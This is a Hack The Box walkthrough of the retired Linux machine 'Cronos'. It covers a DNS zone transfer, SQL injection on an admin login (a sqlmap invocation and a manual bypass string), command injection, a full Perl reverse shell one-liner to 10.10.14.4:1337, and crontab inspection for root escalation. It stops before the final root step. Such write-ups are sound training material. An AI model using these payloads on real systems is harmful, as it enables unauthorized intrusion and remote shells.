Hack the Box – Cronos Walkthrough

Today we’re going to solve another CTF machine “Cronos”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

Target OS: Linux
Services: SSH, HTTP, ISC Bind
IP Address: 10.10.10.13
Difficulty: Medium
Weakness

SQL Injection
Cron running as root
Contents

Getting user
Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.

Dig
After spending some time on enumerating directories we found nothing. So i thought to do some digging and thought to dig.

dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.10.6-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 311 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Nov 28 17:22:46 CET 2018
;; XFR size: 7 records (messages 1, bytes 203)
We found admin.cronos.htb and after adding that into /etc/hosts we found an administrator login page.

Login

We can try Brute Forcing with different wordlists and usernames but it didn’t work. Then we gave a shot to SQLi and tried SQLMap.

sqlmap -r sqlmap.req --level=5 --risk=3
Inside sqlmap.req we have our POST method.

POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=dnurhq6mp01mvc7thl7t4v56t3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=admin&password=admin
It appears that Username field is vulnerable to SQL injection.

OR manually we can try different methods for more info you can real OWASP SQL injection wiki.

Try admin’– – as username and use random password.

Command Injection
Since we have a command injection we can simply bypass it by placing ‘;’ in the end.

Example 6: Command Injection | OWASP Foundation

Let’s get a reverse shell.

Since we had Perl installed so we have to use Perl reverse shell.

;perl -e ‘use Socket;$i=“10.10.14.4”;$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
And we got shell.

Privilege Escalation
Since we have a user now we’re going after root. Now we have to escalate privileges to become root. Let’s run some privilege escalation scripts to get some basic information.

Normally I use LinEnum.sh script which collect some important information. After doing some research and i found that inside crontab we’ve a command schedule which runs a file as root.

$ cat /etc/crontab

/etc/crontab: system-wide crontab

Unlike any other crontab you don’t have to run the `crontab’

command to install the new version when you edit this file

and files in /etc/cron.d. These files also have username fields,

that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

          •   root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
            
          •   root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
            

Since we have a command running inside crontab as root we can spawn php reverse shell easily.